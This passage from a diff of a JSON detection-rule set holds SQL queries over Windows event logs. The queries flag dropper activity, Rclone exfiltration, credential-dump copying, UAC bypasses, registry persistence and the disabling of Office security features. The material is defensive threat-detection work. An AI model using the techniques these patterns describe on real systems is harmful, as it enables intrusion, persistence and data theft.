Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR NewProcessName LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": 